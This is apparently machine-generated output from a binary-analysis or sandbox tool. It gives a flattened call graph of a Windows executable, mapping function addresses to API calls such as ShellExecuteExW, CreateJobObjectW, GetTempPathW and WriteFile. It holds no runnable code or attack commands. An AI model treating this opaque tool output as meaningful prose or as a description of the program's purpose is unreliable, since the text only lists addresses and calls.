9865->9867 9869 406bbe 9867->9869 9868 406a69 9870 406b60 ??3@YAXPAX 9868->9870 9871 406a77 ??3@YAXPAX 9868->9871 9869->9841 9870->9859 9871->9856 9873 401d56 SetTimer GetMessageW DispatchMessageW KillTimer KiUserCallbackDispatcher 9872->9873 9874 401d89 GetVersionExW 9872->9874 9873->9874 9874->9516 9874->9517 9876 401172 2 API calls 9875->9876 9877 4044db GetCommandLineW 9876->9877 9878 404a97 9877->9878 9879 404ad1 9878->9879 9880 404aa5 9878->9880 9881 404ac9 9879->9881 9882 401526 2 API calls 9879->9882 9880->9881 9883 401526 2 API calls 9880->9883 9881->9528 9882->9879 9883->9880 9885 401458 2 API calls 9884->9885 9891 402de6 9885->9891 9886 402ecc 9887 4013a9 2 API calls 9886->9887 9888 402ed9 ??3@YAXPAX 9887->9888 9888->9531 9890 401458 2 API calls 9890->9891 9891->9886 9891->9890 9892 401526 ??2@YAPAXI ??3@YAXPAX 9891->9892 9894 4013a9 2 API calls 9891->9894 10420 40283b 9891->10420 10423 402ad8 9891->10423 9892->9891 9895 402e46 ??3@YAXPAX 9894->9895 9896 401429 2 API calls 9895->9896 9897 402e5b ??3@YAXPAX ??3@YAXPAX 9896->9897 9897->9891 9899 404407 9898->9899 9900 404421 lstrlenW lstrlenW 9899->9900 9901 404444 9899->9901 10434 401c74 9900->10434 9901->9535 9901->9537 9904 40491a 9903->9904 9905 402131 3 API calls 9904->9905 9906 40491f 9905->9906 9907 402187 19 API calls 9906->9907 9908 404926 9907->9908 9909 402187 19 API calls 9908->9909 9910 404932 9909->9910 9911 402187 19 API calls 9910->9911 9912 40493e 9911->9912 9913 402187 19 API calls 9912->9913 9914 40494a 9913->9914 9915 402187 19 API calls 9914->9915 9916 404956 9915->9916 9917 402187 19 API calls 9916->9917 9918 404962 9917->9918 9919 402187 19 API calls 9918->9919 9925 40496e 9919->9925 9920 404989 SHGetSpecialFolderPathW 9921 4049a3 wsprintfW 9920->9921 9920->9925 9923 401458 2 API calls 9921->9923 9922 404a3c 9922->9538 9923->9925 9924 401458 2 API calls 9924->9925 9925->9920 9925->9922 9925->9924 9927 401370 ??2@YAPAXI ??3@YAXPAX 9925->9927 9928 4032d9 7 API calls 9925->9928 10444 40269a ??3@YAXPAX ??3@YAXPAX 9925->10444 9927->9925 9928->9925 10445 40236f LoadLibraryA GetProcAddress 9929->10445 9931 4023a5 9931->9576 10448 40c9b5 9932->10448 9936 40250f 2 API calls 9935->9936 9937 402837 9936->9937 9938 403c93 9937->9938 9939 40236f 3 API calls 9938->9939 9940 403ca1 9939->9940 9941 402823 2 API calls 9940->9941 9942 403cda 9941->9942 9943 402823 2 API calls 9942->9943 9944 403ce2 9943->9944 9945 402823 2 API calls 9944->9945 9946 403cea 9945->9946 10454 403ba2 9946->10454 9952 403d27 9953 403d80 9952->9953 9955 403ba2 7 API calls 9952->9955 9958 402bee 10 API calls 9952->9958 9962 402989 2 API calls 9952->9962 10500 402953 9952->10500 9954 403ba2 7 API calls 9953->9954 9956 403d96 9954->9956 9955->9952 9957 402bee 10 API calls 9956->9957 9959 403da8 9957->9959 9958->9952 10497 402989 9959->10497 9962->9952 9963 403e1e ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9963->9602 9964 403ba2 7 API calls 9966 403dbe 9964->9966 9965 402bee 10 API calls 9965->9966 9966->9963 9966->9964 9966->9965 9967 402953 2 API calls 9966->9967 9968 402989 2 API calls 9966->9968 9967->9966 9968->9966 9970 4026b0 lstrcmpW 9969->9970 9971 404b1f 9970->9971 9972 404b6f 9971->9972 9974 401370 2 API calls 9971->9974 9973 4026b0 lstrcmpW 9972->9973 9975 404b8d 9973->9975 9976 404b36 9974->9976 9978 4026b0 lstrcmpW 9975->9978 9977 402187 19 API calls 9976->9977 9979 404b3d 9977->9979 9980 404ba5 9978->9980 9981 4027c2 2 API calls 9979->9981 9983 4026b0 lstrcmpW 9980->9983 9982 404b46 9981->9982 9984 401370 2 API calls 9982->9984 9985 404bbd 9983->9985 9986 404b5f 9984->9986 9988 4026b0 lstrcmpW 9985->9988 9987 402187 19 API calls 9986->9987 9989 404b66 9987->9989 9990 404bd5 9988->9990 9991 4027c2 2 API calls 9989->9991 9992 404bec 9990->9992 9993 404bdc lstrcmpiW 9990->9993 9991->9972 9994 4026b0 lstrcmpW 9992->9994 9993->9992 9995 404c02 9994->9995 9996 4026b0 lstrcmpW 9995->9996 9997 404c2f 9996->9997 9998 404c3c 9997->9998 10530 4043a6 9997->10530 10000 4026b0 lstrcmpW 9998->10000 10004 404c50 10000->10004 10001 404c70 10003 4026b0 lstrcmpW 10001->10003 10010 404c83 10003->10010 10004->10001 10005 4026b0 lstrcmpW 10004->10005 10534 40434d 10004->10534 10005->10004 10006 404ca3 10007 4026b0 lstrcmpW 10006->10007 10009 404caf 10007->10009 10011 4026b0 lstrcmpW 10009->10011 10010->10006 10012 4026b0 lstrcmpW 10010->10012 10538 40437e 10010->10538 10013 404cc0 10011->10013 10012->10010 10014 4026b0 lstrcmpW 10013->10014 10015 404cd1 10014->10015 10016 404ce7 10015->10016 10017 404cde _wtol 10015->10017 10018 4026b0 lstrcmpW 10016->10018 10017->10016 10019 404cf3 10018->10019 10020 404d03 10019->10020 10021 404cfa _wtol 10019->10021 10022 4026b0 lstrcmpW 10020->10022 10021->10020 10023 404d0f 10022->10023 10024 4026b0 lstrcmpW 10023->10024 10025 404d27 10024->10025 10026 4026b0 lstrcmpW 10025->10026 10027 404d3f 10026->10027 10027->9679 10546 40261a 10028->10546 10032 404648 10031->10032 10034 404605 10031->10034 10032->9648 10032->9649 10033 40133e 2 API calls 10033->10034 10034->10033 10035 4041f8 20 API calls 10034->10035 10036 404622 SetEnvironmentVariableW ??3@YAXPAX 10035->10036 10036->10032 10036->10034 10038 401458 2 API calls 10037->10038 10039 404556 10038->10039 10040 4027aa 2 API calls 10039->10040 10041 40455f GetTempPathW 10040->10041 10042 404578 10041->10042 10047 40458f 10041->10047 10043 4027aa 2 API calls 10042->10043 10044 404583 GetTempPathW 10043->10044 10044->10047 10045 4027aa 2 API calls 10046 4045b2 wsprintfW 10045->10046 10046->10047 10047->10045 10048 4045c9 GetFileAttributesW 10047->10048 10049 4045ed 10047->10049 10048->10047 10048->10049 10049->9726 10051 401745 10050->10051 10066 40d041 3 API calls 10051->10066 10052 401769 10053 401794 10052->10053 10550 40110a 10052->10550 10055 408dbf 57 API calls 10053->10055 10059 40179c 10055->10059 10057 4017bc 10058 4017d4 ??2@YAPAXI 10057->10058 10060 4036f1 88 API calls 10057->10060 10061 4017e0 10058->10061 10062 4017e7 10058->10062 10059->9743 10063 4017cf 10060->10063 10573 401470 10061->10573 10554 401611 10062->10554 10063->10058 10063->10059 10066->10052 10068 402426 10067->10068 10069 40242b 10067->10069 10068->9844 10070 40236f 3 API calls 10069->10070 10071 402430 10070->10071 10072 402441 10071->10072 10073 40243a 10071->10073 10072->9844 10991 4023e9 LoadLibraryA GetProcAddress 10073->10991 10077 4044c6 2 API calls 10076->10077 10078 4048b7 10077->10078 10079 401429 2 API calls 10078->10079 10080 4048c2 10079->10080 10081 4048c7 10080->10081 10082 40133e 2 API calls 10081->10082 10083 4048d5 10082->10083 10084 4027c2 2 API calls 10083->10084 10085 4048e0 10084->10085 10085->9862 10087 401458 2 API calls 10086->10087 10088 404f78 10087->10088 10089 401458 2 API calls 10088->10089 10090 404f80 memset 10089->10090 10091 404fae 10090->10091 10092 404a97 2 API calls 10091->10092 10093 404fd1 10092->10093 10094 401370 2 API calls 10093->10094 10095 404fdc 10094->10095 10096 404fe1 ??3@YAXPAX 10095->10096 10097 404ffa ShellExecuteExW 10095->10097 10098 404fec ??3@YAXPAX 10096->10098 10099 405014 10097->10099 10100 40503a 10097->10100 10098->9868 10101 405028 CloseHandle 10099->10101 10102 40501d WaitForSingleObject 10099->10102 10103 405031 ??3@YAXPAX 10100->10103 10101->10103 10102->10101 10103->10098 10105 407c87 4 API calls 10104->10105 10106 404eb5 10105->10106 10107 402187 19 API calls 10106->10107 10108 404ec3 10107->10108 10109 402771 2 API calls 10108->10109 10110 404ecd 10109->10110 10111 404f03 wsprintfW 10110->10111 10113 4027c2 ??2@YAPAXI ??3@YAXPAX 10110->10113 10112 4027c2 2 API calls 10111->10112 10114 404f31 10112->10114 10113->10110 10115 4027c2 2 API calls 10114->10115 10116 404f3e 10115->10116 10117 407ce8 22 API calls 10116->10117 10118 404f53 ??3@YAXPAX 10117->10118 10993 407a5b ??3@YAXPAX 10118->10993 10120 404f64 10120->9564 10122 40cdda ctype 3 API calls 10121->10122 10123 404521 10122->10123 10124 40ccfd ctype 3 API calls 10123->10124 10125 40ce45 ??3@YAXPAX 10124->10125 10125->9551 10127 4052b4 10126->10127 10133 4052d0 10126->10133 10130 4052c6 _wtol 10127->10130 10127->10133 10128 404f67 9 API calls 10129 4052f3 10128->10129 10131 405301 10129->10131 10132 4052fb GetLastError 10129->10132 10130->10133 10131->9564 10132->10131 10133->10128 10135 40ca5c 2 API calls 10134->10135 10136 4054ed 10135->10136 10137 405549 10136->10137 10139 402771 2 API calls 10136->10139 10138 402823 2 API calls 10137->10138 10140 405551 10138->10140 10145 4054fc 10139->10145 10141 4028b9 2 API calls 10140->10141 10142 40555e 10141->10142 10143 402953 2 API calls 10142->10143 10147 40556b 10143->10147 10144 4055ba ??3@YAXPAX 10150 4055b6 10144->10150 10145->10144 10146 4036f1 88 API calls 10145->10146 10148 405520 10146->10148 10149 402953 2 API calls 10147->10149 10148->10144 10152 40ca5c 2 API calls 10148->10152 10151 405578 10149->10151 10150->9624 10153 402953 2 API calls 10151->10153 10155 40553c 10152->10155 10154 405585 10153->10154 10156 40d0a5 2 API calls 10154->10156 10155->10144 10157 405540 ??3@YAXPAX 10155->10157 10158 405599 10156->10158 10157->10137 10158->10144 10159 4055a2 ??3@YAXPAX 10158->10159 10159->10150 10161 402823 2 API calls 10160->10161 10177 403415 10161->10177 10162 4036b4 ??3@YAXPAX 10163 4036eb 10162->10163 10163->9612 10163->9617 10164 401458 ??2@YAPAXI ??3@YAXPAX 10164->10177 10165 402823 2 API calls 10165->10177 10166 402ad8 ??2@YAPAXI ??3@YAXPAX MultiByteToWideChar 10166->10177 10167 4013a9 2 API calls 10168 403486 ??3@YAXPAX ??3@YAXPAX 10167->10168 10169 4036c0 10168->10169 10168->10177 10999 402d30 10169->10999 10173 4036e1 ??3@YAXPAX 10173->10163 10174 403593 strncmp 10176 40357e strncmp 10174->10176 10174->10177 10176->10174 10176->10177 10177->10162 10177->10164 10177->10165 10177->10166 10177->10167 10177->10169 10177->10174 10179 40292b ??2@YAPAXI ??3@YAXPAX 10177->10179 10180 4013a9 2 API calls 10177->10180 10181 40292b 2 API calls 10177->10181 10185 403648 lstrlenW wcsncmp 10177->10185 10186 40261a lstrcmpW 10177->10186 10187 4032d9 7 API calls 10177->10187 10188 401370 2 API calls 10177->10188 10994 402662 10177->10994 10998 40269a ??3@YAXPAX ??3@YAXPAX 10177->10998 10179->10177 10182 403600 ??3@YAXPAX 10180->10182 10181->10176 10183 402dd6 9 API calls 10182->10183 10184 403611 lstrcmpW 10183->10184 10184->10177 10185->10177 10186->10177 10187->10177 10188->10177 10190 4032e8 10189->10190 10192 4032f3 10189->10192 11018 4029b7 10190->11018 10193 4107a2 4 API calls 10192->10193 10194 4032ff 10193->10194 10194->9614 10195->9614 10197 402771 2 API calls 10196->10197 10198 404d62 10197->10198 10199 4027c2 2 API calls 10198->10199 10200 404d6f 10199->10200 10201 404d8b 10200->10201 10202 401526 2 API calls 10200->10202 10203 4027c2 2 API calls 10201->10203 10202->10200 10204 404d95 10203->10204 10205 40464b 94 API calls 10204->10205 10206 404da0 ??3@YAXPAX 10205->10206 10206->9679 10208 404662 lstrlenW 10207->10208 10209 40468e 10207->10209 10210 401c74 CharUpperW 10208->10210 10209->9679 10211 404678 10210->10211 10211->10208 10211->10209 10212 404695 10211->10212 10213 402771 2 API calls 10212->10213 10216 40469e 10213->10216 11023 402b20 10216->11023 10217 403400 87 API calls 10218 40470c 10217->10218 10219 404716 ??3@YAXPAX ??3@YAXPAX 10218->10219 10220 40472d ??3@YAXPAX ??3@YAXPAX 10218->10220 10219->10209 10220->10209 10222 402491 CheckTokenMembership FreeSid 10221->10222 10223 4024ab 10221->10223 10222->10223 10223->9635 10223->9642 10225 40133e 2 API calls 10224->10225 10226 4048f3 10225->10226 10227 401526 2 API calls 10226->10227 10228 4048fe 10227->10228 10228->9700 10229->9699 10231 407c87 4 API calls 10230->10231 10232 4041b3 10231->10232 10232->9674 10233->9685 10238 409205 10234->10238 10247 408fa0 10234->10247 10235 4026b0 lstrcmpW 10235->10247 10236 407c87 4 API calls 10236->10247 10237 40851f 25 API calls 10237->10247 10238->9695 10239 4084df 25 API calls 10239->10247 10240 408461 25 API calls 10240->10247 10242 4041ab 4 API calls 10242->10247 10244 402187 19 API calls 10244->10247 10245 408dbf 57 API calls 10245->10247 10246 404497 4 API calls 10246->10247 10247->10235 10247->10236 10247->10237 10247->10238 10247->10239 10247->10240 10247->10242 10247->10244 10247->10245 10247->10246 10248 408d52 27 API calls 10247->10248 10249 407ce8 22 API calls 10247->10249 11033 407d62 10247->11033 11037 407a5b ??3@YAXPAX 10247->11037 10248->10247 10249->10247 10251 4026b0 lstrcmpW 10250->10251 10252 408ec8 10251->10252 10253 408ed6 10252->10253 11038 401bdf GetStdHandle WriteFile 10252->11038 10255 408ee9 10253->10255 11039 401bdf GetStdHandle WriteFile 10253->11039 10257 408efe 10255->10257 11040 401bdf GetStdHandle WriteFile 10255->11040 10261 408f0f 10257->10261 11041 401bdf GetStdHandle WriteFile 10257->11041 10260 4026b0 lstrcmpW 10262 408f1c 10260->10262 10261->10260 10263 408f2a 10262->10263 11042 401bdf GetStdHandle WriteFile 10262->11042 10264 4026b0 lstrcmpW 10263->10264 10266 408f37 10264->10266 10267 408f45 10266->10267 11043 401bdf GetStdHandle WriteFile 10266->11043 10269 4026b0 lstrcmpW 10267->10269 10270 408f52 10269->10270 10271 408f60 10270->10271 11044 401bdf GetStdHandle WriteFile 10270->11044 10273 4026b0 lstrcmpW 10271->10273 10274 408f6d 10273->10274 10275 408f7d 10274->10275 11045 401bdf GetStdHandle WriteFile 10274->11045 10275->9688 10278 408484 10277->10278 10279 4084b7 10278->10279 10280 408499 10278->10280 11049 407e6c 10279->11049 11046 407e3a 10280->11046 10285 407ce8 22 API calls 10287 4084b2 10285->10287 10286 407ce8 22 API calls 10286->10287 11052 407a5b ??3@YAXPAX 10287->11052 10289 4084da 10289->9693 10291 4084f4 10290->10291 10292 407e53 4 API calls 10291->10292 10293 4084ff 10292->10293 10294 407ce8 22 API calls 10293->10294 10295 408510 10294->10295 11056 407a5b ??3@YAXPAX 10295->11056 10297 40851a 10297->9693 10299 408532 10298->10299 11057 407e85 10299->11057 10302 407ce8 22 API calls 10303 408567 10302->10303 11060 407a5b ??3@YAXPAX 10303->11060 10305 408571 10305->9743 10307 4044c4 ??3@YAXPAX ??3@YAXPAX 10306->10307 10308 4044b9 10306->10308 10307->9564 10309 402ff3 16 API calls 10308->10309 10309->10307 10311 4026b0 lstrcmpW 10310->10311 10312 404a60 10311->10312 10313 404a95 10312->10313 10314 401370 2 API calls 10312->10314 10313->9797 10315 404a6f 10314->10315 10316 4041f8 20 API calls 10315->10316 10317 404a75 10316->10317 10317->10313 10318 401526 2 API calls 10317->10318 10318->10313 10320 401458 2 API calls 10319->10320 10321 405053 10320->10321 10322 401458 2 API calls 10321->10322 10323 40505b GetCommandLineW 10322->10323 10324 404a97 2 API calls 10323->10324 10325 40506b 10324->10325 10326 4048a9 2 API calls 10325->10326 10327 40509e 10326->10327 10328 4048c7 2 API calls 10327->10328 10329 4050ab 10328->10329 10330 4048c7 2 API calls 10329->10330 10331 4050b8 10330->10331 10332 4048e5 2 API calls 10331->10332 10333 4050c5 10332->10333 10334 4048e5 2 API calls 10333->10334 10335 4050d2 10334->10335 10336 4048e5 2 API calls 10335->10336 10337 4050df 10336->10337 10338 4048e5 2 API calls 10337->10338 10339 4050ec 10338->10339 10340 4048c7 2 API calls 10339->10340 10341 4050f9 10340->10341 10342 4048c7 2 API calls 10341->10342 10343 405106 10342->10343 10344 4048c7 2 API calls 10343->10344 10345 405113 10344->10345 10346 4013a9 2 API calls 10345->10346 10347 40511f 12 API calls 10346->10347 10348 4051b4 GetLastError 10347->10348 10349 4051d7 CreateJobObjectW 10347->10349 10350 4051bc ??3@YAXPAX ??3@YAXPAX 10348->10350 10351 405252 ResumeThread WaitForSingleObject 10349->10351 10352 4051ef AssignProcessToJobObject 10349->10352 10350->9854 10354 405262 CloseHandle GetExitCodeProcess 10351->10354 10352->10351 10353 4051fd CreateIoCompletionPort 10352->10353 10353->10351 10355 40520f SetInformationJobObject ResumeThread 10353->10355 10356 405288 CloseHandle 10354->10356 10357 40527f GetLastError 10354->10357 10360 40523d GetQueuedCompletionStatus 10355->10360 10358 405291 CloseHandle 10356->10358 10359 405294 10356->10359 10357->10356 10358->10359 10361 40529a CloseHandle 10359->10361 10362 40529f 10359->10362 10360->10351 10363 405237 10360->10363 10361->10362 10362->10350 10363->10354 10363->10360 10365 4023d9 10364->10365 10366 4023be LoadLibraryA GetProcAddress 10364->10366 10365->9840 10366->10365 10368 401458 2 API calls 10367->10368 10376 404dbf 10368->10376 10369 401370 2 API calls 10369->10376 10370 404e51 10371 404e8b ??3@YAXPAX 10370->10371 10373 404dae 3 API calls 10370->10373 10371->9795 10372 401526 2 API calls 10372->10376 10375 404e88 10373->10375 10374 4026b0 lstrcmpW 10374->10376 10375->10371 10376->10369 10376->10370 10376->10372 10376->10374 10378 407c87 4 API calls 10377->10378 10379 40449f 10378->10379 10379->9770 10380->9753 10382 4054b6 ??3@YAXPAX 10381->10382 10383 40531a 10381->10383 10385 4054bc 10382->10385 10383->10382 10384 40532e GetDriveTypeW 10383->10384 10384->10382 10386 40535a 10384->10386 10385->9756 10387 404545 6 API calls 10386->10387 10388 405368 CreateFileW 10387->10388 10389 405480 ??3@YAXPAX ??3@YAXPAX 10388->10389 10390 40538e 10388->10390 10389->10385 10391 401458 2 API calls 10390->10391 10392 405397 10391->10392 10393 401370 2 API calls 10392->10393 10394 4053a4 10393->10394 10395 4027c2 2 API calls 10394->10395 10396 4053b2 10395->10396 10397 401429 2 API calls 10396->10397 10398 4053be 10397->10398 10399 4027c2 2 API calls 10398->10399 10400 4053cc 10399->10400 10401 4027c2 2 API calls 10400->10401 10402 4053d9 10401->10402 10403 401429 2 API calls 10402->10403 10404 4053e5 10403->10404 10405 4027c2 2 API calls 10404->10405 10406 4053f2 10405->10406 10407 4027c2 2 API calls 10406->10407 10408 4053fb 10407->10408 10409 401429 2 API calls 10408->10409 10410 405407 10409->10410 10411 4027c2 2 API calls 10410->10411 10412 405410 10411->10412 10413 402b20 3 API calls 10412->10413 10414 405422 WriteFile ??3@YAXPAX CloseHandle 10413->10414 10415 405450 10414->10415 10416 405491 10414->10416 10415->10416 10417 405458 SetFileAttributesW ShellExecuteW ??3@YAXPAX 10415->10417 10418 402ff3 16 API calls 10416->10418 10417->10389 10419 405499 ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 10418->10419 10419->10385 10429 40250f 10420->10429 10424 401458 2 API calls 10423->10424 10425 402ae4 10424->10425 10426 402b1c 10425->10426 10427 4027aa 2 API calls 10425->10427 10426->9891 10428 402b01 MultiByteToWideChar 10427->10428 10428->10426 10430 402549 10429->10430 10431 40251d ??2@YAPAXI 10429->10431 10430->9891 10431->10430 10432 40252e ??3@YAXPAX 10431->10432 10432->10430 10435 401cc2 10434->10435 10437 401c82 10434->10437 10435->9901 10436 40ccb4 CharUpperW 10436->10437 10437->10435 10437->10436 10438 401ccf 10437->10438 10442 40ccb4 CharUpperW 10438->10442 10440 401cdf 10443 40ccb4 CharUpperW 10440->10443 10442->10440 10443->10435 10444->9925 10446 402390 GetNativeSystemInfo 10445->10446 10447 40239c 10445->10447 10446->9931 10447->9931 10451 40c998 10448->10451 10452 40c95f 2 API calls 10451->10452 10453 405be0 10452->10453 10453->9594 10453->9595 10504 4028b9 10454->10504 10457 4028b9 2 API calls 10458 403bc9 10457->10458 10508 402a0d 10458->10508 10461 4028f3 2 API calls 10462 403be6 ??3@YAXPAX 10461->10462 10463 402a0d 3 API calls 10462->10463 10464 403c01 10463->10464 10465 4028f3 2 API calls 10464->10465 10466 403c0c ??3@YAXPAX 10465->10466 10467 403c22 10466->10467 10468 403c4c 10466->10468 10467->10468 10469 403c27 wsprintfA 10467->10469 10470 403c52 wsprintfA 10468->10470 10471 403c79 10468->10471 10472 402953 2 API calls 10469->10472 10473 402953 2 API calls 10470->10473 10474 402953 2 API calls 10471->10474 10476 403c41 10472->10476 10477 403c6e 10473->10477 10475 403c86 10474->10475 10478 402953 2 API calls 10475->10478 10479 402953 2 API calls 10476->10479 10480 402953 2 API calls 10477->10480 10481 403c8e 10478->10481 10479->10468 10480->10471 10482 402bee 10481->10482 10483 402bfb 10482->10483 10491 40d041 3 API calls 10483->10491 10484 402c0d lstrlenA lstrlenA 10486 402c3a 10484->10486 10485 402d18 10493 4028f3 10485->10493 10486->10485 10487 402ce5 memmove 10486->10487 10488 402c85 memcmp 10486->10488 10489 402cc2 memcmp 10486->10489 10492 40d00d GetLastError 10486->10492 10523 40292b 10486->10523 10487->10485 10487->10486 10488->10485 10488->10486 10489->10486 10491->10484 10492->10486 10494 4028ff 10493->10494 10496 402910 10493->10496 10495 40250f 2 API calls 10494->10495 10495->10496 10496->9952 10498 40255b 2 API calls 10497->10498 10499 402999 10498->10499 10499->9966 10501 402962 10500->10501 10502 40255b 2 API calls 10501->10502 10503 40296f 10502->10503 10503->9952 10505 4028cf 10504->10505 10506 40250f 2 API calls 10505->10506 10507 4028dc 10506->10507 10507->10457 10509 402a28 10508->10509 10510 402a3f 10509->10510 10511 402a34 10509->10511 10512 402823 2 API calls 10510->10512 10520 40286b 10511->10520 10514 402a48 10512->10514 10515 40250f 2 API calls 10514->10515 10517 402a51 10515->10517 10516 402a3d 10516->10461 10518 40286b 2 API calls 10517->10518 10519 402a7f ??3@YAXPAX 10518->10519 10519->10516 10521 40250f 2 API calls 10520->10521 10522 402886 10521->10522 10522->10516 10526 40255b 10523->10526 10527 40259f 10526->10527 10528 40256f 10526->10528 10527->10486 10529 40250f 2 API calls 10528->10529 10529->10527 10531 4043c4 10530->10531 10542 4042ea 10531->10542 10535 40435a 10534->10535 10536 4042ea _wtol 10535->10536 10537 40437b 10536->10537 10537->10004 10539 40438b 10538->10539 10540 4042ea _wtol 10539->10540 10541 4043a3 10540->10541 10541->10010 10543 4042f4 10542->10543 10544 40430f _wtol 10543->10544 10545 404348 10543->10545 10544->10543 10545->9998 10549 402625 10546->10549 10547 402631 lstrcmpW 10548 40264e 10547->10548 10547->10549 10548->9686 10549->10547 10549->10548 10578 410e26 10550->10578 10586 410329 _EH_prolog 10550->10586 10551 40112a 10551->10053 10551->10057 10555 401624 10554->10555 10556 401370 2 API calls 10555->10556 10557 401631 10556->10557 10558 401526 2 API calls 10557->10558 10559 40163a CreateThread 10558->10559 10560 401669 10559->10560 10561 40166e WaitForSingleObject 10559->10561 10985 4012e3 10559->10985 10562 40851f 25 API calls 10560->10562 10563 40168b 10561->10563 10564 4016bd 10561->10564 10562->10561 10567 4016a9 10563->10567 10569 40169a 10563->10569 10565 4016b9 10564->10565 10566 4016c5 GetExitCodeThread 10564->10566 10565->10059 10568 4016dc 10566->10568 10570 408dbf 57 API calls 10567->10570 10568->10565 10568->10569 10571 40170b SetLastError 10568->10571 10569->10565 10572 408dbf 57 API calls 10569->10572 10570->10565 10571->10569 10572->10565 10574 401458 2 API calls 10573->10574 10575 401489 10574->10575 10576 401458 2 API calls 10575->10576 10577 401495 10576->10577 10577->10062 10579 410e38 10578->10579 10585 40d041 3 API calls 10579->10585 10580 410e4c 10583 410e83 10580->10583 10584 40d041 3 API calls 10580->10584 10581 410e60 10581->10583 10602 410ccb 10581->10602 10583->10551 10584->10581 10585->10580 10587 410349 10586->10587 10588 410e26 11 API calls 10587->10588 10589 41036e 10588->10589 10590 410390 10589->10590 10591 410377 10589->10591 10630 4127aa _EH_prolog 10590->10630 10633 40ff49 10591->10633 10615 40e0d0 10602->10615 10604 410cf7 10604->10583 10605 410ce3 10605->10604 10618 40e036 10605->10618 10608 410d30 10609 410dc4 ??3@YAXPAX 10608->10609 10610 410dcf ??3@YAXPAX 10608->10610 10612 410dad memmove 10608->10612 10613 410dd9 memcpy 10608->10613 10609->10604 10610->10604 10612->10608 10614 40d041 3 API calls 10613->10614 10614->10610 10626 40e085 10615->10626 10619 40e080 memcpy 10618->10619 10620 40e043 10618->10620 10619->10608 10621 40e048 ??2@YAPAXI 10620->10621 10622 40e06e 10620->10622 10623 40e070 ??3@YAXPAX 10621->10623 10624 40e058 memmove 10621->10624 10622->10623 10623->10619 10624->10623 10627 40e0c9 10626->10627 10628 40e097 10626->10628 10627->10605 10628->10627 10629 40d00d GetLastError 10628->10629 10629->10628 10641 412525 10630->10641 10968 40fdd9 10633->10968 10663 40fc0a 10641->10663 10786 40fb7b 10663->10786 10787 40cdda ctype 3 API calls 10786->10787 10788 40fb84 10787->10788 10789 40cdda ctype 3 API calls 10788->10789 10790 40fb8c 10789->10790 10791 40cdda ctype 3 API calls 10790->10791 10792 40fb94 10791->10792 10793 40cdda ctype 3 API calls 10792->10793 10794 40fb9c 10793->10794 10795 40cdda ctype 3 API calls 10794->10795 10796 40fba4 10795->10796 10797 40cdda ctype 3 API calls 10796->10797 10798 40fbac 10797->10798 10799 40cdda ctype 3 API calls 10798->10799 10800 40fbb6 10799->10800 10801 40cdda ctype 3 API calls 10800->10801 10802 40fbbe 10801->10802 10803 40cdda ctype 3 API calls 10802->10803 10804 40fbcb 10803->10804 10805 40cdda ctype 3 API calls 10804->10805 10806 40fbd3 10805->10806 10807 40cdda ctype 3 API calls 10806->10807 10808 40fbe0 10807->10808 10809 40cdda ctype 3 API calls 10808->10809 10810 40fbe8 10809->10810 10811 40cdda ctype 3 API calls 10810->10811 10812 40fbf5 10811->10812 10813 40cdda ctype 3 API calls 10812->10813 10814 40fbfd 10813->10814 10969 40cdda ctype 3 API calls 10968->10969 10970 40fde7 10969->10970 10986 4012ec 10985->10986 10987 4012ff 10985->10987 10986->10987 10988 4012ee Sleep 10986->10988 10989 401338 10987->10989 10990 40132a EndDialog 10987->10990 10988->10986 10990->10989 10992 40240b 10991->10992 10992->10068 10993->10120 10995 402697 10994->10995 10996 40266f lstrcmpW 10994->10996 10995->10177 10997 402686 10996->10997 10997->10995 10997->10996 10998->10177 11000 402d4b 10999->11000 11001 402d3f 10999->11001 11003 402823 2 API calls 11000->11003 11017 401bdf GetStdHandle WriteFile 11001->11017 11005 402d55 11003->11005 11004 402d46 11016 40269a ??3@YAXPAX ??3@YAXPAX 11004->11016 11006 402d80 11005->11006 11011 40292b 2 API calls 11005->11011 11007 402ad8 3 API calls 11006->11007 11008 402d92 11007->11008 11009 402da0 11008->11009 11010 402db4 11008->11010 11012 408dbf 57 API calls 11009->11012 11013 408dbf 57 API calls 11010->11013 11011->11005 11014 402daf ??3@YAXPAX ??3@YAXPAX 11012->11014 11013->11014 11014->11004 11016->10173 11017->11004 11019 40133e 2 API calls 11018->11019 11020 4029c5 11019->11020 11021 40133e 2 API calls 11020->11021 11022 4029d1 11021->11022 11022->10192 11024 402823 2 API calls 11023->11024 11025 402b2f 11024->11025 11026 402b6b 11025->11026 11029 4028a1 11025->11029 11026->10217 11030 4028b3 WideCharToMultiByte 11029->11030 11031 4028ad 11029->11031 11030->11026 11032 40250f 2 API calls 11031->11032 11032->11030 11034 407d72 11033->11034 11035 407d6d 11033->11035 11034->11035 11036 407ce8 22 API calls 11034->11036 11035->10247 11036->11035 11037->10247 11038->10253 11039->10255 11040->10257 11041->10261 11042->10263 11043->10267 11044->10271 11045->10275 11047 407c87 4 API calls 11046->11047 11048 407e42 11047->11048 11048->10285 11053 407e53 11049->11053 11052->10289 11054 407c87 4 API calls 11053->11054 11055 407e5b 11054->11055 11055->10286 11056->10297 11058 407c87 4 API calls 11057->11058 11059 407e8d 11058->11059 11059->10302 11060->10305 8704 40c9e5 ReadFile
                                                                    APIs
                                                                    • ?_set_new_handler@@YAP6AHI@ZP6AHI@Z@Z.MSVCRT ref: 00405734
                                                                      • Part of subcall function 00401D21: GetModuleHandleW.KERNEL32(00000000,00000000,?,?,?,?,?,?,00405740,?,00000000), ref: 00401D2D
                                                                      • Part of subcall function 00401D21: CreateWindowExW.USER32(00000000,Static,004154C8,00000000,000000F6,000000F6,00000005,00000005,00000000,00000000,00000000), ref: 00401D4A
                                                                      • Part of subcall function 00401D21: SetTimer.USER32(00000000,00000001,00000001,00000000), ref: 00401D5C
                                                                      • Part of subcall function 00401D21: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00401D69
                                                                      • Part of subcall function 00401D21: DispatchMessageW.USER32(?), ref: 00401D73
                                                                      • Part of subcall function 00401D21: KillTimer.USER32(00000000,00000001,?,?,?,?,?,?,00405740,?,00000000), ref: 00401D7C
                                                                      • Part of subcall function 00401D21: KiUserCallbackDispatcher.NTDLL(00000000,?,?,?,?,?,?,00405740,?,00000000), ref: 00401D83
                                                                    • GetVersionExW.KERNEL32(?,?,00000000), ref: 00405751
                                                                    • GetCommandLineW.KERNEL32(?,00000020,?,00000000), ref: 004057E2
                                                                      • Part of subcall function 00402DD6: ??3@YAXPAX@Z.MSVCRT(?,00000000,00000000,00000000,00000020,?,?,?,?,?,?,?,?,?,00405802,00000000), ref: 00402E49
